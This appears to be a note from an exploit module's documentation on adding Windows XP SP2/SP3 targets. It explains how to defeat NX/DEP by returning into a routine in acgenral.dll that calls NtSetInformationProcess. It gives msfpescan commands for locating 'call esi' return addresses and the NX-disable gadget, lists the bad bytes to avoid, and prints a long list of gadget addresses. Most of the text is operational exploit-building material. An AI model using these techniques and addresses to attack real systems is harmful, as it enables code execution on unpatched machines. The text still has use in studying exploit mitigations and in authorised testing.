*** WINDOWS XP SP2/SP3 TARGETS ***


This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX
for the process and then returns back to a call ESI instruction. These addresses are different
between operating systems, service packs, and language packs, but the steps below can be used to
add new targets.


If the target system does not have NX/NX, just place a "call ESI" return into both the Ret and
DisableNX elements of the target hash.

If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.
First obtain the value for the Ret element of the hash with the following command:

$ msfpescan -j esi acgenral.dll

Pick whatever address you like, just make sure it does not contain 00 0a 0d 5c 2f or 2e.

Next, find the location of the function we use to disable NX. Use the following command:

$ msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll

This address should be placed into the DisableNX element of the target hash.

The Scratch element of 0x00020408 should work on all versions of Windows

The actual function we use to disable NX looks like this:

push 4
lea eax, [ebp+arg_0]
push eax
push 22h
push 0FFFFFFFFh
mov [ebp+arg_0], 2
call ds:__imp__NtSetInformationProcess@16

[c:\m\acgenral.dll]
0x6fe1f807 call esi
0x6fe214f8 call esi
0x6fe2153f call esi
0x6fe218ab call esi
0x6fe218b6 call esi
0x6fe22b32 call esi
0x6fe22b37 call esi
0x6fe22b65 call esi
0x6fe22b70 call esi
0x6fe22b94 call esi
0x6fe22b9a call esi
0x6fe22bea call esi
0x6fe22bef call esi
0x6fe2349c call esi
0x6fe2350c call esi
0x6fe25334 call esi
0x6fe2533b call esi
0x6fe253b4 call esi
0x6fe253bb call esi
0x6fe25a60 call esi
0x6fe25a8e call esi
0x6fe25add call esi
0x6fe25ae2 call esi
0x6fe26961 call esi
0x6fe26964 call esi
0x6fe26967 call esi
0x6fe26a08 call esi
0x6fe26a44 call esi
0x6fe26a54 call esi
0x6fe27fef call esi
0x6fe27ff9 call esi
0x6fe2856e call esi
0x6fe2b04a call esi
0x6fe2d8c5 call esi
0x6fe2d8cd call esi
0x6fe2daa8 call esi
0x6fe2dac0 call esi
0x6fe2dad3 call esi
0x6fe2daeb call esi
0x6fe2dafe call esi
0x6fe2db16 call esi
0x6fe2db2d call esi
0x6fe2db43 call esi
0x6fe2db6c call esi
0x6fe2dc4c call esi
0x6fe2dc6a call esi
0x6fe2dc7d call esi
0x6fe2dc95 call esi
0x6fe2dcaa call esi
0x6fe2de42 call esi
0x6fe2deaf call esi
0x6fe2e055 call esi
0x6fe2e06a call esi
0x6fe2e0f5 call esi
0x6fe2e105 call esi
0x6fe3092e call esi
0x6fe3093c call esi
0x6fe31358 call esi
0x6fe31375 call esi
0x6fe31403 call esi
0x6fe31421 call esi
0x6fe33830 call esi
0x6fe33843 call esi
0x6fe3387a call esi
0x6fe3388d call esi
0x6fe338c4 call esi
0x6fe338d7 call esi
0x6fe34f80 call esi
0x6fe34fa9 call esi
0x6fe34fd2 call esi
0x6fe34ffb call esi
0x6fe35024 call esi
0x6fe3504d call esi
0x6fe35076 call esi
0x6fe3509f call esi
0x6fe350c8 call esi
0x6fe38938 call esi
0x6fe3896f call esi
0x6fe389a2 call esi
0x6fe389c5 call esi
0x6fe3ba79 push esi; ret
0x6fe3bac2 push esi; ret
0x6fe3bafb push esi; ret
0x6fe3c9da call esi
0x6fe3ca35 call esi
0x6fe3d082 call esi
0x6fe3d093 call esi
0x6fe3d0a0 call esi
0x6fe3d0b6 call esi
0x6fe3d0c7 call esi
0x6fe3e111 call esi
0x6fe3e124 call esi
0x6fe3ff23 call esi
0x6fe4174b call esi

[c:\m\acgenral.dll]
0x6fe217c2 6a048d4508506a226aff